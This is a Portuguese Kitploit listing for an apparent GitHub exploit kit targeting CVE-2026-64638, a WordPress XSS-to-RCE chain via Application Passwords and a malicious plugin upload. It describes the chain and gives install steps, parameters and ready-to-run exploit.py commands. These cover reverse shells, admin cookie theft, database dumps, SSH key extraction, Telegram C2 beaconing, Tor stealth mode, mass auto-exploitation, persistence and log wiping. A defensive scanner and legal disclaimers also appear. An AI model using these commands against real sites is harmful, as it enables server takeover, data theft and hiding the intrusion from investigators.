Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-64638-PoC-Exploit — 🛡️ CVE-2026-64638 - Suíte de Avaliação de Segurança para WordPress (CVSS 8.9) | Kit de pentest para WordPress 4.7.0-7.0.2. Inclui avaliação de vulnerabilidades e módulos de análise avançada. 🐍 Verificação Segura & Exploit, 2 modos. Kit Avançado Blue&Red Team Best 2026-64638, uso somente autorizado. Mantenha-se Legal <3zd | Kitploit
Ferramentas/GitHubGitHub/tc4dy/cve-2026-64638-poc-exploit
Escalada de PrivilégiosScanners de VulnerabilidadesForensia de MemóriaMecanismos de PersistênciaExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoComando e Controle

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

🛡️ CVE-2026-64638 - Suíte de Avaliação de Segurança para WordPress (CVSS 8.9) | Kit de pentest para WordPress 4.7.0-7.0.2. Inclui avaliação de vulnerabilidades e módulos de análise avançada. 🐍 Verificação Segura & Exploit, 2 modos. Kit Avançado Blue&Red Team Best 2026-64638, uso somente autorizado. Mantenha-se Legal <3zd

GitHubtc4dy/cve-2026-64638-poc-exploit

CVE-2026-64638-PoC-Exploit

Ver Repositório
18há 1 mêsAinda não revisado
Compartilhar

CVE PoC

🌀 CVE‑2026‑64638 – Suíte de Segurança WordPress XSS2Shell

Python 3.8+ CVSS Author WordPress

⚠️ APENAS USO ÉTICO – TESTE DE SEGURANÇA AUTORIZADO
Este repositório fornece ferramentas exclusivamente para profissionais de segurança autorizados, blue teams e pentesters.
O acesso não autorizado a sistemas informáticos é ilegal ao abrigo da CFAA (EUA), Computer Misuse Act (Reino Unido), TCK 243/244 (Turquia) e leis semelhantes em todo o mundo.


📖 Visão Geral da Vulnerabilidade

CVE‑2026‑64638 é uma vulnerabilidade crítica de XSS refletido pré-autenticação nas versões 4.7.0 a 7.0.2 do WordPress que permite a um atacante escalar um ataque de XSS para execução remota de código (RCE) total através do recurso Application Password.

Como funciona

  1. Parser Differential – o strip_tags() do PHP e o wp_kses_post() do WordPress analisam tags HTML de forma diferente, permitindo que entrada maliciosa ultrapasse a sanitização.
  2. XSS Refletido – um atacante injeta um payload especialmente criado no formulário de login (wp-login.php). Quando o login falha, o payload é refletido de volta e executado no navegador da vítima.
  3. Abuso da Application Password – o JavaScript injetado gera automaticamente uma Application Password através da REST API do WordPress, exfiltrando-a para o atacante.
  4. Upload de Plugin (RCE) – usando a Application Password capturada, o atacante autentica-se no painel administrativo e envia um plugin malicioso contendo uma webshell.
  5. Comprometimento Total do Sistema – a webshell permite a execução de comandos no sistema, possibilitando reverse shells, persistência, movimento lateral e tomada total do servidor.

Versões Afetadas

  • WordPress 4.7.0 – 7.0.2 – vulnerável
  • WordPress 7.0.3 e posteriores – corrigida
  • Atualizações de segurança foram retroportadas para todos os ramos mantidos

Correção

  • Atualize para o WordPress 7.0.3 ou mais recente.
  • Se não for possível atualizar, desative o recurso Application Password como solução temporária.

🧰 Ferramentas

FerramentaObjetivoPúblico-alvo
exploit.pyConjunto completo de exploração com reverse shell, persistência, C2, escalada de privilégios, análise forense de memória, dump da base de dados, extração de chaves SSH e varredura em massa.

📊 Comparação de Recursos


🎯 Resumo de Casos de Uso


⚙️ Instalação

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]

📋 Parâmetros

Parâmetros do exploit.py

Parâmetros do safecheck.py


💥 Cenários


📊 Comandos do Shell Interativo


🧪 Utilização de Endpoints e API

EndpointFinalidade
/wp-login.phpPágina de login – ponto de injeção de XSS

🛡️ Utilização Responsável

  • Utilize estas ferramentas apenas em sistemas que possui ou para os quais tem autorização escrita explícita para testar.
  • O acesso não autorizado é ilegal e antiético.
  • Os autores não são responsáveis por qualquer utilização indevida.
  • Siga sempre as leis e regulamentos do seu país.

Este software é fornecido apenas para fins educacionais e testes de segurança autorizados.

Conformidade Legal

Baixar ferramenta
Red teams / pentesters autorizados
safecheck.pyVerificador de vulnerabilidades não intrusivo que deteta a reflexão de XSS e avalia a postura de segurança sem executar qualquer payload malicioso. Gera relatórios detalhados.Blue teams / auditores de segurança
Recursoexploit.pysafecheck.py
Deteção de vulnerabilidades✅✅
Deteção da versão do WordPress✅✅
Deteção de reflexão de XSS✅✅
Captura de Application Password✅❌
Upload de plugin (RCE)✅❌
Reverse shell✅❌
Beaconing C2 (HTTP/DNS/Telegram)✅❌
Escalada de privilégios✅❌
Análise forense de memória✅❌
Dump da base de dados✅❌
Extração de chaves SSH✅❌
Métodos de persistência✅❌
Auditoria de cabeçalhos de segurança❌✅
Verificação de exposição de ficheiros de configuração❌✅
Verificação de listagem de diretórios❌✅
Verificação de exposição do phpinfo❌✅
Varredura em massa✅✅
Suporte a proxy✅✅
Suporte a Tor✅✅
Tunelamento Ngrok✅❌
Shell interativo✅❌
Modo não intrusivo (seguro)❌✅
Saída JSON / relatório✅✅
CenárioFerramenta Recomendada
Blue Team – verificar se a sua instalação do WordPress está vulnerávelsafecheck.py
Auditoria de Segurança – avaliação não intrusiva de vulnerabilidadessafecheck.py
Red Team – testes de penetração autorizados com exploração totalexploit.py
Bug Bounty – teste de divulgação responsávelsafecheck.py
Varredura em Massa – verificar vários alvos quanto a vulnerabilidadeexploit.py ou safecheck.py
Resposta a Incidentes – verificar se os sistemas estão comprometidossafecheck.py
Pós-Exploração Avançada – persistência, C2, forenseexploit.py
ParâmetroDescrição
-t, --targetURL do WordPress alvo (ex.: https://wordpress-site.com)
-l, --listFicheiro contendo lista de alvos (um por linha) para varredura em massa
--lhostEndereço IP local para callbacks de reverse shell
--lportPorta local para reverse shell (padrão: 4444)
--proxyProxy HTTP/HTTPS (ex.: http://127.0.0.1:8080)
--timeoutTimeout do pedido em segundos (padrão: 10)
--retryNúmero de tentativas (padrão: 3)
--threadsNúmero de threads para varredura em massa (padrão: 5)
--exploitExplorar automaticamente alvos vulneráveis durante a varredura em massa
--ngrok-tokenAuthtoken do Ngrok para tunelamento externo
--payload-typeTipo de payload XSS: reflected, dom_based, waf_bypass, case_manipulation, double_encoded
--session-hijackAtivar sequestro de sessão (roubar cookies de administrador)
--dump-dbDespejar a base de dados do WordPress (requer pymysql)
--extract-sshExtrair chaves SSH do sistema alvo
--torEncaminhar tráfego através do Tor (socks5h://127.0.0.1:9050)
--stealthAtivar modo stealth (spoofar cabeçalhos, atrasar pedidos)
--no-cleanupIgnorar limpeza de logs após a exploração
--ssl-verifyVerificar certificados SSL
--c2-typeTipo de C2: http, dns, telegram
--c2-serverURL do servidor C2 ou token do bot do Telegram
--auto-priv-escEscalada automática de privilégios após a shell
--memory-forensicsAtivar módulo de análise forense de memória
-v, --verboseSaída detalhada
-q, --quietModo silencioso (saída mínima)
ParâmetroDescrição
-t, --targetURL do WordPress alvo (ex.: https://wordpress-site.com)
-l, --listFicheiro contendo lista de alvos (um por linha) para varredura em massa
--timeoutTimeout do pedido em segundos (padrão: 10)
--retryNúmero de tentativas (padrão: 3)
--threadsNúmero de threads para varredura em massa (padrão: 5)
--proxyProxy HTTP/HTTPS (ex.: http://127.0.0.1:8080)
--torEncaminhar tráfego através do Tor (socks5h://127.0.0.1:9050)
--ssl-verifyVerificar certificados SSL
--outputFicheiro de relatório JSON de saída
-v, --verboseSaída detalhada
-q, --quietModo silencioso (saída mínima)
#CenárioComando
1Verificação rápida de vulnerabilidadepython safecheck.py -t https://wordpress-site.com
2Varredura detalhada com relatóriopython safecheck.py -t https://wordpress-site.com --output report.json -v
3Exploração total com reverse shellpython exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit
4Usar payload XSS personalizadopython exploit.py -t https://wordpress-site.com --payload-type waf_bypass
5Sequestro de sessão (roubar cookies de administrador)python exploit.py -t https://wordpress-site.com --session-hijack
6Despejar a base de dados do WordPresspython exploit.py -t https://wordpress-site.com --dump-db
7Extrair chaves SSHpython exploit.py -t https://wordpress-site.com --extract-ssh
8Usar Tor para anonimatopython exploit.py -t https://wordpress-site.com --tor --stealth
9Beaconing C2 com Telegrampython exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id"
10Varredura em massa a partir de ficheiropython exploit.py -l targets.txt --threads 10 --exploit
11Análise forense de memória após a shellpython exploit.py -t https://wordpress-site.com --memory-forensics
12Escalada automática de privilégiospython exploit.py -t https://wordpress-site.com --auto-priv-esc
13Shell interativopython exploit.py -t https://wordpress-site.com -i
14Tunelamento Ngrokpython exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN
ComandoDescrição
reverseIniciar listener de reverse shell
persistAplicar métodos de persistência (cron, systemd, rc.local, SSH, WP)
cleanLimpar logs e histórico do sistema
dumpdbDespejar a base de dados do WordPress
sshExtrair chaves SSH
privEscalada automática de privilégios
memExecutar análise forense de memória
c2Mostrar estado do C2
c2taskVerificar tarefas do C2
exitSair do shell interativo
/wp-admin/authorize-application.php
Geração de Application Password
/wp-admin/update.php?action=upload-pluginUpload de plugin (RCE)
/wp-content/plugins/{slug}/{slug}.phpExecução de webshell
PaísLei Relevante
Estados UnidosComputer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030
Reino UnidoComputer Misuse Act 1990
TurquiaTCK 243 (Acesso Não Autorizado), TCK 244 (Interferência no Sistema)
AlemanhaStGB § 202a (Espionagem de Dados), § 202b (Interceção de Dados)
FrançaLoi Godfrain – Article 323-1
AustráliaCybercrime Act 2001
CanadáCódigo Penal – Secção 342.1
ÍndiaInformation Technology Act 2000 – Secções 43, 66
JapãoLei sobre a Proibição do Acesso Não Autorizado a Computadores